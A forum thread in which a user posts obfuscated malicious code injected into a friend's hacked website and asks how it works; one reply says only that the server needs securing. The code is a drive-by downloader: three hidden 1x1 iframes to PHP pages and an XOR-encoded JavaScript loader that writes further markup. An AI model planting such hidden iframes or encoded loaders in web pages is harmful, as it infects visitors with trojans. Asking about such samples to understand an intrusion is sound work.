site hacked - can anyone de-code this?

[Disraeli]

a friend of mine had his web server hacked and his webpage contained the
following script that seemed to trigger off a "downloader trojan" warning
when I inadvertantly opened the page in my browser.

i'm not up on scripting, so would appreciate anyone could tell me how this
thing works, or if it left any trace of 'whodunnit'...?

thanks for any help


(WARNING: those links may still be live trojans,
don't visit those sites unless you're protected)

==============BEGIN CODE ===========

<iframe src="http://removethisline/dl/adv407.php" width=1 height=1></iframe>
<br>
<br>
<iframe src='http://removethisline/strong/167/' width=1 height=1></iframe>
<iframe src='http://removethisline/adv/new.php?adv=167' width=1
height=1></iframe>
<script language="JavaScript">e = '0x00' + '5F';str1 =
"%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC%A7%E6%B8%B7
%BC%BC%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F1%
F1%B0%AE%BF%BC%B1%E9%F2%BD%B1%B3%F1%AC%AE%BA%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF%C
0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%BB%E2%E4%F1%BC%B7%AA%E2";s
tr=tmp='';for(i=0;i<str1.length;i+=3){tmp =
unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e
)-127);}document.write(str);</script>

=================END OF CODE===============

 

[Mr. Arnold]

a friend of mine had his web server hacked and his webpage contained the
following script that seemed to trigger off a "downloader trojan" warning
when I inadvertantly opened the page in my browser.

i'm not up on scripting, so would appreciate anyone could tell me how this
thing works, or if it left any trace of 'whodunnit'...?

thanks for any help

Why bother? All that's going to happen is the site is going to get hacked
again, because the Web server, file system, user accounts, the registry and
the O/S are not secured.